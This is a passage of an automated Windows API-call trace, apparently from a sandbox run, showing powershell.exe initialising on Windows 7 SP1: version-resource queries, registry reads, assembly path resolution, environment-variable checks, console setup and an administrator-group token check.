	[0474.079] VerQueryValueW (in: pBlock=0x2b35780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1cdc78, puLen=0x1cdc70 | out: lplpBuffer=0x1cdc78*=0x2b35a50, puLen=0x1cdc70) returned 1
	[0474.079] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0474.079] CoTaskMemAlloc (cb=0x76) returned 0x381420
	[0474.079] lstrcpyW (in: lpString1=0x381420, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0474.079] CoTaskMemFree (pv=0x381420) 
	[0474.079] VerQueryValueW (in: pBlock=0x2b35780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1cdc78, puLen=0x1cdc70 | out: lplpBuffer=0x1cdc78*=0x2b35aec, puLen=0x1cdc70) returned 1
	[0474.079] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0474.079] CoTaskMemAlloc (cb=0x44) returned 0x3ec7e0
	[0474.079] lstrcpyW (in: lpString1=0x3ec7e0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0474.079] CoTaskMemFree (pv=0x3ec7e0) 
	[0474.079] VerQueryValueW (in: pBlock=0x2b35780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1cdc78, puLen=0x1cdc70 | out: lplpBuffer=0x1cdc78*=0x2b35b50, puLen=0x1cdc70) returned 1
	[0474.080] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0474.080] CoTaskMemAlloc (cb=0x58) returned 0x3a2db0
	[0474.080] lstrcpyW (in: lpString1=0x3a2db0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0474.080] CoTaskMemFree (pv=0x3a2db0) 
	[0474.080] VerQueryValueW (in: pBlock=0x2b35780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1cdc78, puLen=0x1cdc70 | out: lplpBuffer=0x1cdc78*=0x2b35bcc, puLen=0x1cdc70) returned 1
	[0474.080] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0474.080] CoTaskMemAlloc (cb=0x20) returned 0x3e1f80
	[0474.080] lstrcpyW (in: lpString1=0x3e1f80, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0474.080] CoTaskMemFree (pv=0x3e1f80) 
	[0474.080] VerQueryValueW (in: pBlock=0x2b35780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1cdc78, puLen=0x1cdc70 | out: lplpBuffer=0x1cdc78*=0x2b35874, puLen=0x1cdc70) returned 1
	[0474.080] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0474.080] CoTaskMemAlloc (cb=0x66) returned 0x3e9140
	[0474.080] lstrcpyW (in: lpString1=0x3e9140, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0474.080] CoTaskMemFree (pv=0x3e9140) 
	[0474.080] VerQueryValueW (in: pBlock=0x2b35780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1cdc78, puLen=0x1cdc70 | out: lplpBuffer=0x1cdc78*=0x0, puLen=0x1cdc70) returned 0
	[0474.080] VerQueryValueW (in: pBlock=0x2b35780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1cdc78, puLen=0x1cdc70 | out: lplpBuffer=0x1cdc78*=0x0, puLen=0x1cdc70) returned 0
	[0474.080] VerQueryValueW (in: pBlock=0x2b35780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1cdc78, puLen=0x1cdc70 | out: lplpBuffer=0x1cdc78*=0x0, puLen=0x1cdc70) returned 0
	[0474.080] VerQueryValueW (in: pBlock=0x2b35780, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cdc48, puLen=0x1cdc40 | out: lplpBuffer=0x1cdc48*=0x2b3581c, puLen=0x1cdc40) returned 1
	[0474.080] CoTaskMemAlloc (cb=0x204) returned 0x3f00b0
	[0474.080] VerLanguageNameW (in: wLang=0x0, szLang=0x3f00b0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0474.080] CoTaskMemFree (pv=0x3f00b0) 
	[0474.080] VerQueryValueW (in: pBlock=0x2b35780, lpSubBlock="\\", lplpBuffer=0x1cdc98, puLen=0x1cdc90 | out: lplpBuffer=0x1cdc98*=0x2b357a8, puLen=0x1cdc90) returned 1
	[0474.089] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0474.089] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0474.089] CoTaskMemFree (pv=0x3e2be0) 
	[0474.094] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0474.094] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0474.094] CoTaskMemFree (pv=0x3e2be0) 
	[0474.099] lstrlenW (lpString="䅁") returned 1
	[0475.021] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdb68 | out: phkResult=0x1cdb68*=0x2f8) returned 0x0
	[0475.022] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdb58 | out: phkResult=0x1cdb58*=0x2fc) returned 0x0
	[0475.022] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdbe8 | out: phkResult=0x1cdbe8*=0x300) returned 0x0
	[0475.037] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdb2c, lpData=0x0, lpcbData=0x1cdb28*=0x0 | out: lpType=0x1cdb2c*=0x1, lpData=0x0, lpcbData=0x1cdb28*=0x56) returned 0x0
	[0475.038] CoTaskMemAlloc (cb=0x5a) returned 0x3e90d0
	[0475.038] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdafc, lpData=0x3e90d0, lpcbData=0x1cdaf8*=0x56 | out: lpType=0x1cdafc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cdaf8*=0x56) returned 0x0
	[0475.038] CoTaskMemFree (pv=0x3e90d0) 
	[0475.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0475.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0475.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0475.070] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0475.071] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0475.071] CoTaskMemFree (pv=0x3e2be0) 
	[0480.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0480.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0481.573] CoTaskMemAlloc (cb=0x104) returned 0x3e2cf0
	[0481.574] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0481.574] CoTaskMemFree (pv=0x3e2cf0) 
	[0482.408] CoTaskMemAlloc (cb=0x104) returned 0x3e2cf0
	[0482.408] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0482.408] CoTaskMemFree (pv=0x3e2cf0) 
	[0482.451] CoTaskMemAlloc (cb=0x104) returned 0x3e2cf0
	[0482.451] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0482.451] CoTaskMemFree (pv=0x3e2cf0) 
	[0482.453] CoTaskMemAlloc (cb=0x104) returned 0x3e2cf0
	[0482.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0482.454] CoTaskMemFree (pv=0x3e2cf0) 
	[0482.454] CoTaskMemAlloc (cb=0x104) returned 0x3e2cf0
	[0482.454] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0482.454] CoTaskMemFree (pv=0x3e2cf0) 
	[0484.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0484.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0484.951] CoTaskMemAlloc (cb=0x104) returned 0x3e2cf0
	[0484.951] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0484.951] CoTaskMemFree (pv=0x3e2cf0) 
	[0484.955] CoTaskMemAlloc (cb=0x104) returned 0x3e2cf0
	[0484.955] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0484.955] CoTaskMemFree (pv=0x3e2cf0) 
	[0486.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0486.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0492.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0492.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0493.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0493.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0495.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0495.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0499.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0499.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0501.044] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0501.044] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0501.044] CoTaskMemFree (pv=0x3e2f10) 
	[0501.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0501.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0501.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0501.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0501.742] SetErrorMode (uMode=0x1) returned 0x1
	[0501.742] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1cdac0 | out: lpFileInformation=0x1cdac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0501.742] SetErrorMode (uMode=0x1) returned 0x1
	[0503.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0503.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0503.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0503.987] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0503.987] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.988] CoTaskMemFree (pv=0x3e2f10) 
	[0503.991] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0503.991] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.991] CoTaskMemFree (pv=0x3e2f10) 
	[0503.991] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0503.991] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.991] CoTaskMemFree (pv=0x3e2f10) 
	[0504.531] CoCreateGuid (in: pguid=0x1cde88 | out: pguid=0x1cde88*(Data1=0x6c179ce6, Data2=0x5bee, Data3=0x4075, Data4=([0]=0x9a, [1]=0x4a, [2]=0x2b, [3]=0x78, [4]=0x38, [5]=0xe8, [6]=0x26, [7]=0xde))) returned 0x0
	[0504.534] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0504.534] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0504.534] CoTaskMemFree (pv=0x3e2f10) 
	[0504.537] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0504.537] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0504.537] CoTaskMemFree (pv=0x3e2f10) 
	[0504.540] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0504.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0504.540] CoTaskMemFree (pv=0x3e2f10) 
	[0504.548] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0504.549] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1cdb30 | out: lpConsoleScreenBufferInfo=0x1cdb30) returned 1
	[0504.557] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0504.557] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1cdb30 | out: lpConsoleScreenBufferInfo=0x1cdb30) returned 1
	[0504.558] GetVersionExW (in: lpVersionInformation=0x1cdac0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cdac0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0504.561] GetCurrentProcess () returned 0xffffffffffffffff
	[0504.562] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1cdb58 | out: TokenHandle=0x1cdb58*=0x1c4) returned 1
	[0504.566] GetTokenInformation (in: TokenHandle=0x1c4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cda78 | out: TokenInformation=0x0, ReturnLength=0x1cda78) returned 0
	[0504.567] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x347290
	[0504.567] GetTokenInformation (in: TokenHandle=0x1c4, TokenInformationClass=0x8, TokenInformation=0x347290, TokenInformationLength=0x4, ReturnLength=0x1cda78 | out: TokenInformation=0x347290, ReturnLength=0x1cda78) returned 1
	[0504.568] DuplicateTokenEx (in: hExistingToken=0x1c4, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1cdbd8 | out: phNewToken=0x1cdbd8*=0x1c8) returned 1
	[0508.914] GetTokenInformation (in: TokenHandle=0x1c4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cda78 | out: TokenInformation=0x0, ReturnLength=0x1cda78) returned 0
	[0508.915] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3472c0
	[0508.915] GetTokenInformation (in: TokenHandle=0x1c4, TokenInformationClass=0x8, TokenInformation=0x3472c0, TokenInformationLength=0x4, ReturnLength=0x1cda78 | out: TokenInformation=0x3472c0, ReturnLength=0x1cda78) returned 1
	[0508.915] CheckTokenMembership (in: TokenHandle=0x1c8, SidToCheck=0x2c10528*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1cdbe8 | out: IsMember=0x1cdbe8) returned 1
	[0508.915] CloseHandle (hObject=0x1c8) returned 1
	[0509.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0509.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0509.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0509.687] CoTaskMemAlloc (cb=0x804) returned 0x1b7b0d00
	[0509.687] GetConsoleTitleW (in: lpConsoleTitle=0x1b7b0d00, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0509.687] CoTaskMemFree (pv=0x1b7b0d00) 
	[0509.711] CoTaskMemAlloc (cb=0x804) returned 0x1b7b15b0
